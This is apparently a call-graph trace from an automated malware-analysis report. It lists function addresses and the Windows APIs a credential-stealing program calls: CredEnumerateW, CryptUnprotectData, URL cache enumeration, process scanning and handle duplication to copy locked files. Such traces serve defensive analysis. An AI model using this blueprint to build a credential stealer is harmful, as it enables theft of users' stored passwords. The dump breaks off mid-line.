38814 40b2d1 38814->38757 38816 40b5a4 GetModuleHandleW FindResourceW 38815->38816 38817 40b62e 38815->38817 38818 40b5c2 LoadResource 38816->38818 38820 40b5e7 38816->38820 38817->38814 38819 40b5d0 SizeofResource LockResource 38818->38819 38818->38820 38819->38820 38820->38817 38828 40afcf 38820->38828 38822 40b608 memcpy 38831 40b4d3 memcpy 38822->38831 38824 40b61e 38832 40b3c1 18 API calls 38824->38832 38826 40b626 38833 40b04b 38826->38833 38829 40b04b ??3@YAXPAX 38828->38829 38830 40afd7 ??2@YAPAXI 38829->38830 38830->38822 38831->38824 38832->38826 38834 40b051 ??3@YAXPAX 38833->38834 38835 40b05f 38833->38835 38834->38835 38835->38817 38836->38701 38838 4032c4 38837->38838 38839 40b633 free 38838->38839 38840 403316 38839->38840 38859 44553b 38840->38859 38844 403480 39057 40368c 15 API calls 38844->39057 38846 403489 38847 40b633 free 38846->38847 38849 403495 38847->38849 38848 40333c 38848->38844 38850 4033a9 memset memcpy 38848->38850 38851 4033ec wcscmp 38848->38851 39055 4028e7 11 API calls 38848->39055 39056 40f508 6 API calls 38848->39056 38849->38703 38850->38848 38850->38851 38851->38848 38854 403421 _wcsicmp 38854->38848 38856 444a64 FreeLibrary 38855->38856 38857 444a83 38855->38857 38856->38857 38857->38703 38858->38704 38860 445548 38859->38860 38861 445599 38860->38861 39058 40c768 38860->39058 38862 4455a8 memset 38861->38862 38869 4457f2 38861->38869 39141 403988 38862->39141 38872 445854 38869->38872 39243 403e2d memset memset memset memset memset 38869->39243 38870 4455e5 38881 445672 38870->38881 38886 44560f 38870->38886 38871 4458bb memset memset 38874 414c2e 17 API calls 38871->38874 38925 4458aa 38872->38925 39266 403c9c memset memset memset memset memset 38872->39266 38877 4458f9 38874->38877 38876 44595e memset memset 38884 414c2e 17 API calls 38876->38884 38885 40b2cc 27 API calls 38877->38885 38879 44558c 39125 444b06 38879->39125 38880 44557a 38880->38879 39339 4136c0 CoTaskMemFree 38880->39339 39152 403fbe memset memset memset memset memset 38881->39152 38882 445a00 memset memset 39289 414c2e 38882->39289 38883 445b22 38889 445bca 38883->38889 38890 445b38 memset memset memset 38883->38890 38894 44599c 38884->38894 38896 445909 38885->38896 38898 4087b3 338 API calls 38886->38898 38888 445849 39355 40b1ab free free 38888->39355 38897 445c8b memset memset 38889->38897 38963 445cf0 38889->38963 38901 445bd4 38890->38901 38902 445b98 38890->38902 38895 40b2cc 27 API calls 38894->38895 38909 4459ac 38895->38909 38906 409d1f 6 API calls 38896->38906 38910 414c2e 17 API calls 38897->38910 38907 445621 38898->38907 38899 44589f 39356 40b1ab free free 38899->39356 38900 445585 39340 41366b FreeLibrary 38900->39340 38916 414c2e 17 API calls 38901->38916 38902->38901 38912 445ba2 38902->38912 38905 403335 39054 4452e5 45 API calls 38905->39054 38920 445919 38906->38920 39341 4454bf 20 API calls 38907->39341 38908 445823 38908->38888 38930 4087b3 338 API calls 38908->38930 38921 409d1f 6 API calls 38909->38921 38922 445cc9 38910->38922 39428 4099c6 wcslen 38912->39428 38913 4456b2 39343 40b1ab free free 38913->39343 38915 40b2cc 27 API calls 38926 445a4f 38915->38926 38917 445be2 38916->38917 38928 40b2cc 27 API calls 38917->38928 38918 445d3d 38948 40b2cc 27 API calls 38918->38948 38919 445d88 memset memset memset 38931 414c2e 17 API calls 38919->38931 39357 409b98 GetFileAttributesW 38920->39357 38932 4459bc 38921->38932 38933 409d1f 6 API calls 38922->38933 38923 445879 38923->38899 38944 4087b3 338 API calls 38923->38944 38925->38871 38949 44594a 38925->38949 39305 409d1f wcslen wcslen 38926->39305 38938 445bf3 38928->38938 38930->38908 38941 445dde 38931->38941 39424 409b98 GetFileAttributesW 38932->39424 38943 445ce1 38933->38943 38934 445bb3 39431 445403 memset 38934->39431 38935 445680 38935->38913 39175 4087b3 memset 38935->39175 38947 409d1f 6 API calls 38938->38947 38939 445928 38939->38949 39358 40b6ef 38939->39358 38950 40b2cc 27 API calls 38941->38950 39448 409b98 GetFileAttributesW 38943->39448 38944->38923 38946 40b2cc 27 API calls 38955 445a94 38946->38955 38957 445c07 38947->38957 38958 445d54 _wcsicmp 38948->38958 38949->38876 38962 4459ed 38949->38962 38961 445def 38950->38961 38951 4459cb 38951->38962 38971 40b6ef 253 API calls 38951->38971 39310 40ae18 38955->39310 38956 44566d 38956->38869 39226 413d4c 38956->39226 38967 445389 259 API calls 38957->38967 38968 445d71 38958->38968 39031 445d67 38958->39031 38960 445665 39342 40b1ab free free 38960->39342 38969 409d1f 6 API calls 38961->38969 38962->38882 38962->38883 38963->38905 38963->38918 38963->38919 38964 445389 259 API calls 38964->38889 38973 445c17 38967->38973 39449 445093 23 API calls 38968->39449 38976 445e03 38969->38976 38971->38962 38972 4456d8 38978 40b2cc 27 API calls 38972->38978 38979 40b2cc 27 API calls 38973->38979 38975 44563c 38975->38960 38981 4087b3 338 API calls 38975->38981 39450 409b98 GetFileAttributesW 38976->39450 38977 40b6ef 253 API calls 38977->38905 38983 4456e2 38978->38983 38984 445c23 38979->38984 38980 445d83 38980->38905 38981->38975 39344 413fa6 _wcsicmp _wcsicmp 38983->39344 38988 409d1f 6 API calls 38984->38988 38986 445e12 38993 445e6b 38986->38993 39000 40b2cc 27 API calls 38986->39000 38991 445c37 38988->38991 38989 445aa1 38992 445b17 38989->38992 39007 445ab2 memset 38989->39007 39020 409d1f 6 API calls 38989->39020 39317 40add4 38989->39317 39322 445389 38989->39322 39331 40ae51 38989->39331 38990 4456eb 38996 4456fd memset memset memset memset 38990->38996 38997 4457ea 38990->38997 38998 445389 259 API calls 38991->38998 39425 40aebe 38992->39425 39452 445093 23 API calls 38993->39452 39345 409c70 wcscpy wcsrchr 38996->39345 39348 413d29 38997->39348 39003 445c47 38998->39003 39004 445e33 39000->39004 39001 445e7e 39006 445f67 39001->39006 39009 40b2cc 27 API calls 39003->39009 39010 409d1f 6 API calls 39004->39010 39015 40b2cc 27 API calls 39006->39015 39011 40b2cc 27 API calls 39007->39011 39013 445c53 39009->39013 39014 445e47 39010->39014 39011->38989 39012 409c70 2 API calls 39016 44577e 39012->39016 39017 409d1f 6 API calls 39013->39017 39451 409b98 GetFileAttributesW 39014->39451 39019 445f73 39015->39019 39021 409c70 2 API calls 39016->39021 39022 445c67 39017->39022 39024 409d1f 6 API calls 39019->39024 39020->38989 39025 44578d 39021->39025 39026 445389 259 API calls 39022->39026 39023 445e56 39023->38993 39029 445e83 memset 39023->39029 39027 445f87 39024->39027 39025->38997 39033 40b2cc 27 API calls 39025->39033 39026->38889 39455 409b98 GetFileAttributesW 39027->39455 39032 40b2cc 27 API calls 39029->39032 39031->38905 39031->38977 39034 445eab 39032->39034 39035 4457a8 39033->39035 39036 409d1f 6 API calls 39034->39036 39037 409d1f 6 API calls 39035->39037 39038 445ebf 39036->39038 39039 4457b8 39037->39039 39040 40ae18 9 API calls 39038->39040 39347 409b98 GetFileAttributesW 39039->39347 39050 445ef5 39040->39050 39042 4457c7 39042->38997 39044 4087b3 338 API calls 39042->39044 39043 40ae51 9 API calls 39043->39050 39044->38997 39045 445f5c 39047 40aebe FindClose 39045->39047 39046 40add4 2 API calls 39046->39050 39047->39006 39048 40b2cc 27 API calls 39048->39050 39049 409d1f 6 API calls 39049->39050 39050->39043 39050->39045 39050->39046 39050->39048 39050->39049 39052 445f3a 39050->39052 39453 409b98 GetFileAttributesW 39050->39453 39454 445093 23 API calls 39052->39454 39054->38848 39055->38854 39056->38848 39057->38846 39059 40c775 39058->39059 39456 40b1ab free free 39059->39456 39061 40c788 39457 40b1ab free free 39061->39457 39063 40c790 39458 40b1ab free free 39063->39458 39065 40c798 39066 40aa04 free 39065->39066 39067 40c7a0 39066->39067 39459 40c274 memset 39067->39459 39072 40a8ab 9 API calls 39073 40c7c3 39072->39073 39074 40a8ab 9 API calls 39073->39074 39075 40c7d0 39074->39075 39488 40c3c3 39075->39488 39079 40c877 39088 40bdb0 39079->39088 39080 40c86c 39530 4053fe 39 API calls 39080->39530 39086 40c7e5 39086->39079 39086->39080 39087 40c634 50 API calls 39086->39087 39513 40a706 39086->39513 39087->39086 39759 404363 39088->39759 39091 40bf5d 39779 40440c 39091->39779 39092 40bdee 39092->39091 39096 40b2cc 27 API calls 39092->39096 39093 40bddf CredEnumerateW 39093->39092 39097 40be02 wcslen 39096->39097 39097->39091 39102 40be1e 39097->39102 39098 40be26 wcsncmp 39098->39102 39101 40be7d memset 39101->39102 39103 40bea7 memcpy 39101->39103 39102->39091 39102->39098 39102->39101 39102->39103 39104 40bf11 wcschr 39102->39104 39105 40b2cc 27 API calls 39102->39105 39107 40bf43 LocalFree 39102->39107 39782 40bd5d 28 API calls 39102->39782 39783 404423 39102->39783 39103->39102 39103->39104 39104->39102 39106 40bef6 _wcsnicmp 39105->39106 39106->39102 39106->39104 39107->39102 39108 4135f7 39798 4135e0 39108->39798 39111 40b2cc 27 API calls 39112 41360d 39111->39112 39113 40a804 8 API calls 39112->39113 39114 413613 39113->39114 39115 41361b 39114->39115 39116 41363e 39114->39116 39117 40b273 27 API calls 39115->39117 39118 4135e0 FreeLibrary 39116->39118 39119 413625 GetProcAddress 39117->39119 39120 413643 39118->39120 39119->39116 39121 413648 39119->39121 39120->38880 39122 413658 39121->39122 39123 4135e0 FreeLibrary 39121->39123 39122->38880 39124 413666 39123->39124 39124->38880 39801 4449b9 39125->39801 39128 444c1f 39128->38861 39129 4449b9 42 API calls 39131 444b4b 39129->39131 39130 444c15 39133 4449b9 42 API calls 39130->39133 39131->39130 39822 444972 GetVersionExW 39131->39822 39133->39128 39134 444b99 memcmp 39139 444b8c 39134->39139 39135 444c0b 39826 444a85 42 API calls 39135->39826 39139->39134 39139->39135 39823 444aa5 42 API calls 39139->39823 39824 40a7a0 GetVersionExW 39139->39824 39825 444a85 42 API calls 39139->39825 39142 40399d 39141->39142 39827 403a16 39142->39827 39144 403a09 39841 40b1ab free free 39144->39841 39146 403a12 wcsrchr 39146->38870 39147 4039a3 39147->39144 39150 4039f4 39147->39150 39838 40a02c CreateFileW 39147->39838 39150->39144 39151 4099c6 2 API calls 39150->39151 39151->39144 39153 414c2e 17 API calls 39152->39153 39154 404048 39153->39154 39155 414c2e 17 API calls 39154->39155 39156 404056 39155->39156 39157 409d1f 6 API calls 39156->39157 39158 404073 39157->39158 39159 409d1f 6 API calls 39158->39159 39160 40408e 39159->39160 39161 409d1f 6 API calls 39160->39161 39162 4040a6 39161->39162 39163 403af5 20 API calls 39162->39163 39164 4040ba 39163->39164 39165 403af5 20 API calls 39164->39165 39166 4040cb 39165->39166 39868 40414f memset 39166->39868 39168 404140 39882 40b1ab free free 39168->39882 39169 4040ec memset 39173 4040e0 39169->39173 39171 404148 39171->38935 39172 4099c6 2 API calls 39172->39173 39173->39168 39173->39169 39173->39172 39174 40a8ab 9 API calls 39173->39174 39174->39173 39895 40a6e6 WideCharToMultiByte 39175->39895 39177 4087ed 39896 4095d9 memset 39177->39896 39180 408809 memset memset memset memset memset 39181 40b2cc 27 API calls 39180->39181 39182 4088a1 39181->39182 39183 409d1f 6 API calls 39182->39183 39184 4088b1 39183->39184 39185 40b2cc 27 API calls 39184->39185 39186 4088c0 39185->39186 39187 409d1f 6 API calls 39186->39187 39188 4088d0 39187->39188 39189 40b2cc 27 API calls 39188->39189 39190 4088df 39189->39190 39191 409d1f 6 API calls 39190->39191 39192 4088ef 39191->39192 39193 40b2cc 27 API calls 39192->39193 39194 4088fe 39193->39194 39195 409d1f 6 API calls 39194->39195 39196 40890e 39195->39196 39197 40b2cc 27 API calls 39196->39197 39207 408953 39207->38935 39227 40b633 free 39226->39227 39228 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39227->39228 39229 413f00 Process32NextW 39228->39229 39230 413da5 OpenProcess 39229->39230 39231 413f17 CloseHandle 39229->39231 39232 413eb0 39230->39232 39233 413df3 memset 39230->39233 39231->38972 39232->39229 39235 413ebf free 39232->39235 39236 4099f4 3 API calls 39232->39236 40163 413f27 39233->40163 39235->39232 39236->39232 39237 413e1f 39238 413e37 GetModuleHandleW 39237->39238 40168 413959 39237->40168 40184 413ca4 39237->40184 39238->39237 39240 413e46 GetProcAddress 39238->39240 39240->39237 39242 413ea2 CloseHandle 39242->39232 39244 414c2e 17 API calls 39243->39244 39245 403eb7 39244->39245 39246 414c2e 17 API calls 39245->39246 39247 403ec5 39246->39247 39248 409d1f 6 API calls 39247->39248 39249 403ee2 39248->39249 39250 409d1f 6 API calls 39249->39250 39251 403efd 39250->39251 39252 409d1f 6 API calls 39251->39252 39253 403f15 39252->39253 39254 403af5 20 API calls 39253->39254 39255 403f29 39254->39255 39256 403af5 20 API calls 39255->39256 39257 403f3a 39256->39257 39258 40414f 33 API calls 39257->39258 39264 403f4f 39258->39264 39259 403faf 40198 40b1ab free free 39259->40198 39261 403f5b memset 39261->39264 39262 403fb7 39262->38908 39263 4099c6 2 API calls 39263->39264 39264->39259 39264->39261 39264->39263 39265 40a8ab 9 API calls 39264->39265 39265->39264 39267 414c2e 17 API calls 39266->39267 39268 403d26 39267->39268 39269 414c2e 17 API calls 39268->39269 39270 403d34 39269->39270 39271 409d1f 6 API calls 39270->39271 39272 403d51 39271->39272 39273 409d1f 6 API calls 39272->39273 39274 403d6c 39273->39274 39275 409d1f 6 API calls 39274->39275 39276 403d84 39275->39276 39277 403af5 20 API calls 39276->39277 39278 403d98 39277->39278 39279 403af5 20 API calls 39278->39279 39280 403da9 39279->39280 39281 40414f 33 API calls 39280->39281 39282 403dbe 39281->39282 39283 403e1e 39282->39283 39285 403dca memset 39282->39285 39287 4099c6 2 API calls 39282->39287 39288 40a8ab 9 API calls 39282->39288 40199 40b1ab free free 39283->40199 39285->39282 39286 403e26 39286->38923 39287->39282 39288->39282 39290 414b81 9 API calls 39289->39290 39291 414c40 39290->39291 39292 414c73 memset 39291->39292 40200 409cea 39291->40200 39294 414c94 39292->39294 40203 414592 RegOpenKeyExW 39294->40203 39297 414c64 SHGetSpecialFolderPathW 39299 414d0b 39297->39299 39298 414cc1 39300 414cf4 wcscpy 39298->39300 40204 414bb0 wcscpy 39298->40204 39299->38915 39300->39299 39302 414cd2 40205 4145ac RegQueryValueExW 39302->40205 39304 414ce9 RegCloseKey 39304->39300 39306 409d62 39305->39306 39307 409d43 wcscpy 39305->39307 39306->38946 39308 409719 2 API calls 39307->39308 39309 409d51 wcscat 39308->39309 39309->39306 39311 40aebe FindClose 39310->39311 39312 40ae21 39311->39312 39313 4099c6 2 API calls 39312->39313 39314 40ae35 39313->39314 39315 409d1f 6 API calls 39314->39315 39316 40ae49 39315->39316 39316->38989 39318 40ade0 39317->39318 39321 40ae0f 39317->39321 39319 40ade7 wcscmp 39318->39319 39318->39321 39320 40adfe wcscmp 39319->39320 39319->39321 39320->39321 39321->38989 39323 40ae18 9 API calls 39322->39323 39324 4453c4 39323->39324 39325 40ae51 9 API calls 39324->39325 39326 4453f3 39324->39326 39327 40add4 2 API calls 39324->39327 39330 445403 254 API calls 39324->39330 39325->39324 39328 40aebe FindClose 39326->39328 39327->39324 39329 4453fe 39328->39329 39329->38989 39330->39324 39332 40ae7b FindNextFileW 39331->39332 39333 40ae5c FindFirstFileW 39331->39333 39334 40ae94 39332->39334 39335 40ae8f 39332->39335 39333->39334 39337 40aeb6 39334->39337 39338 409d1f 6 API calls 39334->39338 39336 40aebe FindClose 39335->39336 39336->39334 39337->38989 39338->39337 39339->38900 39340->38879 39341->38975 39342->38956 39343->38956 39344->38990 39346 409c89 39345->39346 39346->39012 39347->39042 39349 413d39 39348->39349 39350 413d2f FreeLibrary 39348->39350 39351 40b633 free 39349->39351 39350->39349 39352 413d42 39351->39352 39353 40b633 free 39352->39353 39354 413d4a 39353->39354 39354->38869 39355->38872 39356->38925 39357->38939 39359 44db70 39358->39359 39360 40b6fc memset 39359->39360 39361 409c70 2 API calls 39360->39361 39362 40b732 wcsrchr 39361->39362 39363 40b743 39362->39363 39364 40b746 memset 39362->39364 39363->39364 39365 40b2cc 27 API calls 39364->39365 39366 40b76f 39365->39366 39367 409d1f 6 API calls 39366->39367 39368 40b783 39367->39368 40206 409b98 GetFileAttributesW 39368->40206 39370 40b792 39371 40b7c2 39370->39371 39372 409c70 2 API calls 39370->39372 40207 40bb98 39371->40207 39374 40b7a5 39372->39374 39376 40b2cc 27 API calls 39374->39376 39380 40b7b2 39376->39380 39377 40b837 CloseHandle 39379 40b83e memset 39377->39379 39378 40b817 39381 409a45 3 API calls 39378->39381 40240 40a6e6 WideCharToMultiByte 39379->40240 39383 409d1f 6 API calls 39380->39383 39384 40b827 CopyFileW 39381->39384 39383->39371 39384->39379 39385 40b866 39386 444432 121 API calls 39385->39386 39387 40b879 39386->39387 39388 40bad5 39387->39388 39389 40b273 27 API calls 39387->39389 39390 40baeb 39388->39390 39391 40bade DeleteFileW 39388->39391 39392 40b89a 39389->39392 39393 40b04b ??3@YAXPAX 39390->39393 39391->39390 39394 438552 134 API calls 39392->39394 39395 40baf3 39393->39395 39396 40b8a4 39394->39396 39395->38949 39397 40bacd 39396->39397 39399 4251c4 137 API calls 39396->39399 39398 443d90 111 API calls 39397->39398 39398->39388 39422 40b8b8 39399->39422 39400 40bac6 40250 424f26 123 API calls 39400->40250 39401 40b8bd memset 40241 425413 17 API calls 39401->40241 39404 425413 17 API calls 39404->39422 39407 40a71b MultiByteToWideChar 39407->39422 39408 40a734 MultiByteToWideChar 39408->39422 39411 40b9b5 memcmp 39411->39422 39412 4099c6 2 API calls 39412->39422 39413 404423 38 API calls 39413->39422 39416 40bb3e memset memcpy 40251 40a734 MultiByteToWideChar 39416->40251 39417 4251c4 137 API calls 39417->39422 39419 40bb88 LocalFree 39419->39422 39422->39400 39422->39401 39422->39404 39422->39407 39422->39408 39422->39411 39422->39412 39422->39413 39422->39416 39422->39417 39423 40ba5f memcmp 39422->39423 40242 4253ef 16 API calls 39422->40242 40243 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39422->40243 40244 4253af 17 API calls 39422->40244 40245 4253cf 17 API calls 39422->40245 40246 447280 memset 39422->40246 40247 447960 memset memcpy memcpy memcpy 39422->40247 40248 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39422->40248 40249 447920 memcpy memcpy memcpy 39422->40249 39423->39422 39424->38951 39426 40aed1 39425->39426 39427 40aec7 FindClose 39425->39427 39426->38883 39427->39426 39429 4099d7 39428->39429 39430 4099da memcpy 39428->39430 39429->39430 39430->38934 39432 40b2cc 27 API calls 39431->39432 39433 44543f 39432->39433 39434 409d1f 6 API calls 39433->39434 39435 44544f 39434->39435 40347 409b98 GetFileAttributesW 39435->40347 39437 44545e 39438 445476 39437->39438 39439 40b6ef 253 API calls 39437->39439 39440 40b2cc 27 API calls 39438->39440 39439->39438 39441 445482 39440->39441 39442 409d1f 6 API calls 39441->39442 39443 445492 39442->39443 40348 409b98 GetFileAttributesW 39443->40348 39445 4454a1 39446 4454b9 39445->39446 39447 40b6ef 253 API calls 39445->39447 39446->38964 39447->39446 39448->38963 39449->38980 39450->38986 39451->39023 39452->39001 39453->39050 39454->39050 39455->39031 39456->39061 39457->39063 39458->39065 39460 414c2e 17 API calls 39459->39460 39461 40c2ae 39460->39461 39531 40c1d3 39461->39531 39466 40c3be 39483 40a8ab 39466->39483 39467 40afcf 2 API calls 39468 40c2fd FindFirstUrlCacheEntryW 39467->39468 39469 40c3b6 39468->39469 39470 40c31e wcschr 39468->39470 39471 40b04b ??3@YAXPAX 39469->39471 39472 40c331 39470->39472 39473 40c35e FindNextUrlCacheEntryW 39470->39473 39471->39466 39475 40a8ab 9 API calls 39472->39475 39473->39470 39474 40c373 GetLastError 39473->39474 39476 40c3ad FindCloseUrlCache 39474->39476 39477 40c37e 39474->39477 39478 40c33e wcschr 39475->39478 39476->39469 39479 40afcf 2 API calls 39477->39479 39478->39473 39480 40c34f 39478->39480 39481 40c391 FindNextUrlCacheEntryW 39479->39481 39482 40a8ab 9 API calls 39480->39482 39481->39470 39481->39476 39482->39473 39686 40a97a 39483->39686 39486 40a8cc 39486->39072 39487 40a8d0 7 API calls 39487->39486 39691 40b1ab free free 39488->39691 39490 40c3dd 39491 40b2cc 27 API calls 39490->39491 39492 40c3e7 39491->39492 39692 414592 RegOpenKeyExW 39492->39692 39494 40c3f4 39495 40c50e 39494->39495 39496 40c3ff 39494->39496 39510 405337 39495->39510 39497 40a9ce 4 API calls 39496->39497 39498 40c418 memset 39497->39498 39693 40aa1d 39498->39693 39501 40c471 39503 40c47a _wcsupr 39501->39503 39502 40c505 RegCloseKey 39502->39495 39504 40a8d0 7 API calls 39503->39504 39505 40c498 39504->39505 39506 40a8d0 7 API calls 39505->39506 39507 40c4ac memset 39506->39507 39508 40aa1d 39507->39508 39509 40c4e4 RegEnumValueW 39508->39509 39509->39502 39509->39503 39695 405220 39510->39695 39514 4099c6 2 API calls 39513->39514 39515 40a714 _wcslwr 39514->39515 39516 40c634 39515->39516 39752 405361 39516->39752 39519 40c65c wcslen 39755 4053b6 39 API calls 39519->39755 39520 40c71d wcslen 39520->39086 39522 40c677 39523 40c713 39522->39523 39756 40538b 39 API calls 39522->39756 39758 4053df 39 API calls 39523->39758 39526 40c6a5 39526->39523 39527 40c6a9 memset 39526->39527 39528 40c6d3 39527->39528 39757 40c589 44 API calls 39528->39757 39530->39079 39532 40ae18 9 API calls 39531->39532 39538 40c210 39532->39538 39533 40ae51 9 API calls 39533->39538 39534 40c264 39535 40aebe FindClose 39534->39535 39537 40c26f 39535->39537 39536 40add4 2 API calls 39536->39538 39543 40e5ed memset memset 39537->39543 39538->39533 39538->39534 39538->39536 39539 40c231 _wcsicmp 39538->39539 39540 40c1d3 35 API calls 39538->39540 39539->39538 39541 40c248 39539->39541 39540->39538 39556 40c084 22 API calls 39541->39556 39544 414c2e 17 API calls 39543->39544 39545 40e63f 39544->39545 39546 409d1f 6 API calls 39545->39546 39547 40e658 39546->39547 39557 409b98 GetFileAttributesW 39547->39557 39549 40e667 39550 40e680 39549->39550 39551 409d1f 6 API calls 39549->39551 39558 409b98 GetFileAttributesW 39550->39558 39551->39550 39553 40e68f 39554 40c2d8 39553->39554 39559 40e4b2 39553->39559 39554->39466 39554->39467 39556->39538 39557->39549 39558->39553 39580 40e01e 39559->39580 39561 40e593 39562 40e5b0 39561->39562 39563 40e59c DeleteFileW 39561->39563 39564 40b04b ??3@YAXPAX 39562->39564 39563->39562 39566 40e5bb 39564->39566 39565 40e521 39565->39561 39603 40e175 39565->39603 39568 40e5c4 CloseHandle 39566->39568 39569 40e5cc 39566->39569 39568->39569 39571 40b633 free 39569->39571 39570 40e573 39572 40e584 39570->39572 39573 40e57c CloseHandle 39570->39573 39574 40e5db 39571->39574 39624 40b1ab free free 39572->39624 39573->39572 39577 40b633 free 39574->39577 39576 40e540 39576->39570 39623 40e2ab 30 API calls 39576->39623 39578 40e5e3 39577->39578 39578->39554 39625 406214 39580->39625 39583 40e16b 39583->39565 39586 40afcf 2 API calls 39587 40e08d OpenProcess 39586->39587 39588 40e0a4 GetCurrentProcess DuplicateHandle 39587->39588 39592 40e152 39587->39592 39589 40e0d0 GetFileSize 39588->39589 39590 40e14a CloseHandle 39588->39590 39661 409a45 GetTempPathW 39589->39661 39590->39592 39591 40e160 39595 40b04b ??3@YAXPAX 39591->39595 39592->39591 39594 406214 22 API calls 39592->39594 39594->39591 39595->39583 39596 40e0ea 39664 4096dc CreateFileW 39596->39664 39598 40e0f1 CreateFileMappingW 39599 40e140 CloseHandle CloseHandle 39598->39599 39600 40e10b MapViewOfFile 39598->39600 39599->39590 39601 40e13b CloseHandle 39600->39601 39602 40e11f WriteFile UnmapViewOfFile 39600->39602 39601->39599 39602->39601 39604 40e18c 39603->39604 39665 406b90 39604->39665 39607 40e1a7 memset 39613 40e1e8 39607->39613 39608 40e299 39675 4069a3 39608->39675 39614 40e283 39613->39614 39615 40dd50 _wcsicmp 39613->39615 39621 40e244 _snwprintf 39613->39621 39682 406e8f 13 API calls 39613->39682 39683 40742e 8 API calls 39613->39683 39684 40aae3 wcslen wcslen _memicmp 39613->39684 39685 406b53 SetFilePointerEx ReadFile 39613->39685 39616 40e291 39614->39616 39617 40e288 free 39614->39617 39615->39613 39618 40aa04 free 39616->39618 39617->39616 39618->39608 39622 40a8d0 7 API calls 39621->39622 39622->39613 39623->39576 39624->39561 39626 406294 CloseHandle 39625->39626 39627 406224 39626->39627 39628 4096c3 CreateFileW 39627->39628 39629 40622d 39628->39629 39630 406281 GetLastError 39629->39630 39632 40a2ef ReadFile 39629->39632 39631 40625a 39630->39631 39631->39583 39636 40dd85 memset 39631->39636 39633 406244 39632->39633 39633->39630 39634 40624b 39633->39634 39634->39631 39635 406777 19 API calls 39634->39635 39635->39631 39637 409bca GetModuleFileNameW 39636->39637 39638 40ddbe CreateFileW 39637->39638 39641 40ddf1 39638->39641 39639 40afcf ??2@YAPAXI ??3@YAXPAX 39639->39641 39640 41352f 9 API calls 39640->39641 39641->39639 39641->39640 39642 40de0b NtQuerySystemInformation 39641->39642 39643 40de3b CloseHandle GetCurrentProcessId 39641->39643 39642->39641 39644 40de54 39643->39644 39645 413d4c 46 API calls 39644->39645 39653 40de88 39645->39653 39646 40e00c 39647 413d29 free FreeLibrary 39646->39647 39648 40e014 39647->39648 39648->39583 39648->39586 39649 40dea9 _wcsicmp 39650 40dee7 OpenProcess 39649->39650 39651 40debd _wcsicmp 39649->39651 39650->39653 39651->39650 39652 40ded0 _wcsicmp 39651->39652 39652->39650 39652->39653 39653->39646 39653->39649 39654 40dfef CloseHandle 39653->39654 39655 40df23 GetCurrentProcess DuplicateHandle 39653->39655 39658 40df8f CloseHandle 39653->39658 39659 40df78 39653->39659 39654->39653 39655->39653 39656 40df4c memset 39655->39656 39657 41352f 9 API calls 39656->39657 39657->39653 39658->39659 39659->39654 39659->39658 39660 40dfae _wcsicmp 39659->39660 39660->39653 39660->39659 39662 409a74 GetTempFileNameW 39661->39662 39663 409a66 GetWindowsDirectoryW 39661->39663 39662->39596 39663->39662 39664->39598 39666 406bd5 39665->39666 39667 406bad 39665->39667 39669 4066bf free malloc memcpy free free 39666->39669 39674 406c0f 39666->39674 39667->39666 39668 406bba _wcsicmp 39667->39668 39668->39666 39668->39667 39670 406be5 39669->39670 39671 40afcf ??2@YAPAXI ??3@YAXPAX 39670->39671 39670->39674 39672 406bff 39671->39672 39673 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39672->39673 39673->39674 39674->39607 39674->39608 39676 4069c4 ??3@YAXPAX 39675->39676 39677 4069af 39676->39677 39678 40b633 free 39677->39678 39679 4069ba 39678->39679 39680 40b04b ??3@YAXPAX 39679->39680 39681 4069c2 39680->39681 39681->39576 39682->39613 39683->39613 39684->39613 39685->39613 39687 40a980 39686->39687 39688 40a8bb 39687->39688 39689 40a995 _wcsicmp 39687->39689 39690 40a99c wcscmp 39687->39690 39688->39486 39688->39487 39689->39687 39690->39687 39691->39490 39692->39494 39694 40aa23 RegEnumValueW 39693->39694 39694->39501 39694->39502 39696 405335 39695->39696 39697 40522a 39695->39697 39696->39086 39698 40b2cc 27 API calls 39697->39698 39699 405234 39698->39699 39700 40a804 8 API calls 39699->39700 39701 40523a 39700->39701 39740 40b273 39701->39740 39703 405248 _mbscpy _mbscat GetProcAddress 39704 40b273 27 API calls 39703->39704 39705 405279 39704->39705 39743 405211 GetProcAddress 39705->39743 39707 405282 39708 40b273 27 API calls 39707->39708 39709 40528f 39708->39709 39744 405211 GetProcAddress 39709->39744 39711 405298 39712 40b273 27 API calls 39711->39712 39713 4052a5 39712->39713 39745 405211 GetProcAddress 39713->39745 39715 4052ae 39716 40b273 27 API calls 39715->39716 39717 4052bb 39716->39717 39746 405211 GetProcAddress 39717->39746 39719 4052c4 39720 40b273 27 API calls 39719->39720 39721 4052d1 39720->39721 39747 405211 GetProcAddress 39721->39747 39723 4052da 39724 40b273 27 API calls 39723->39724 39725 4052e7 39724->39725 39748 405211 GetProcAddress 39725->39748 39727 4052f0 39728 40b273 27 API calls 39727->39728 39729 4052fd 39728->39729 39749 405211 GetProcAddress 39729->39749 39731 405306 39732 40b273 27 API calls 39731->39732 39733 405313 39732->39733 39750 405211 GetProcAddress 39733->39750 39735 40531c 39741 40b58d 27 API calls 39740->39741 39742 40b18c 39741->39742 39742->39703 39743->39707 39744->39711 39745->39715 39746->39719 39747->39723 39748->39727 39749->39731 39750->39735 39753 405220 39 API calls 39752->39753 39754 405369 39753->39754 39754->39519 39754->39520 39755->39522 39756->39526 39757->39523 39758->39520 39760 40440c FreeLibrary 39759->39760 39761 40436d 39760->39761 39762 40a804 8 API calls 39761->39762 39763 404377 39762->39763 39764 404383 39763->39764 39765 404405 39763->39765 39766 40b273 27 API calls 39764->39766 39765->39091 39765->39092 39765->39093 39767 40438d GetProcAddress 39766->39767 39768 40b273 27 API calls 39767->39768 39769 4043a7 GetProcAddress 39768->39769 39770 40b273 27 API calls 39769->39770 39771 4043ba GetProcAddress 39770->39771 39772 40b273 27 API calls 39771->39772 39773 4043ce GetProcAddress 39772->39773 39774 40b273 27 API calls 39773->39774 39775 4043e2 GetProcAddress 39774->39775 39776 4043f1 39775->39776 39777 4043f7 39776->39777 39778 40440c FreeLibrary 39776->39778 39777->39765 39778->39765 39780 404413 FreeLibrary 39779->39780 39781 40441e 39779->39781 39780->39781 39781->39108 39782->39102 39784 40447e 39783->39784 39785 40442e 39783->39785 39786 404485 CryptUnprotectData 39784->39786 39787 40449c 39784->39787 39788 40b2cc 27 API calls 39785->39788 39786->39787 39787->39102 39789 404438 39788->39789 39790 40a804 8 API calls 39789->39790 39791 40443e 39790->39791 39792 404445 39791->39792 39793 